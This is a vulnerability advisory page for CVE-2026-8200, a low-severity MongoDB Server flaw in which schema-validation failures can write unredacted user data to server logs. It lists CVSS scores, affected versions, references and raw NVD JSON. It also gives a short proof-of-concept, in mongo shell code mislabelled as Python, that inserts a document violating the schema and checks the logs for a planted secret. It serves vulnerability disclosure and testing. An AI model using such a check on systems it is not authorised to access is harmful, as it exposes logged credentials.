CVE-2026-8200

Description

When schema validation is enabled on a collection and an update or insert would violate the collection's schema, the local server log message generated may not have all user data redacted. This issue impacts MongoDB Server v7.0 versions prior to 7.0.34, v8.0 versions prior to 8.0.23, v8.2 versions prior to 8.2.9 and v8.3 versions prior to 8.3.2.

CVSS Details

CVSS Score

2.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MongoDB Server v7.0 < 7.0.34

MongoDB Server v8.0 < 8.0.23

MongoDB Server v8.2 < 8.2.9

MongoDB Server v8.3 < 8.3.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// This PoC demonstrates triggering the log redaction issue.
// Prerequisites: Access to a MongoDB instance with a user having high privileges.

// 1. Connect to the database
use testDB;

// 2. Create a collection with strict JSON Schema validation
db.createCollection("sensitive_data", {
   validator: {
      $jsonSchema: {
         bsonType: "object",
         required: ["id", "secret"],
         properties: {
            id: { bsonType: "int" },
            secret: { bsonType: "string" }, // This field contains sensitive data
            extra_data: { bsonType: "string" }
         }
      }
   }
});

// 3. Attempt to insert a document that violates the schema
// In vulnerable versions, the value of 'secret' might be logged in plaintext
// when the validation fails due to the wrong type for 'id'.
db.sensitive_data.insertOne({
   id: "invalid_type_should_be_int", // Triggers validation error
   secret: "MySuperSecretPassword123", // Potential leak in logs
   extra_data: "some_value"
});

// 4. Check the MongoDB server logs (mongod.log)
// Look for entries related to 'Document failed validation'
// The vulnerability is confirmed if 'MySuperSecretPassword123' appears in the log.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8200
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8200
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8200/
[4] VulDB https://vuldb.com/cve/CVE-2026-8200
[5] https://jira.mongodb.org/browse/SERVER-121895

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8200", "sourceIdentifier": "[email protected]", "published": "2026-05-13T04:17:41.700", "lastModified": "2026-05-13T15:34:29.847", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "When schema validation is enabled on a collection and an update or insert would violate the collection's schema, the local server log message generated may not have all user data redacted. \n\n\nThis issue impacts MongoDB Server v7.0 versions prior to 7.0.34, v8.0 versions prior to 8.0.23, v8.2 versions prior to 8.2.9 and v8.3 versions prior to 8.3.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://jira.mongodb.org/browse/SERVER-121895", "source": "[email protected]"}]}}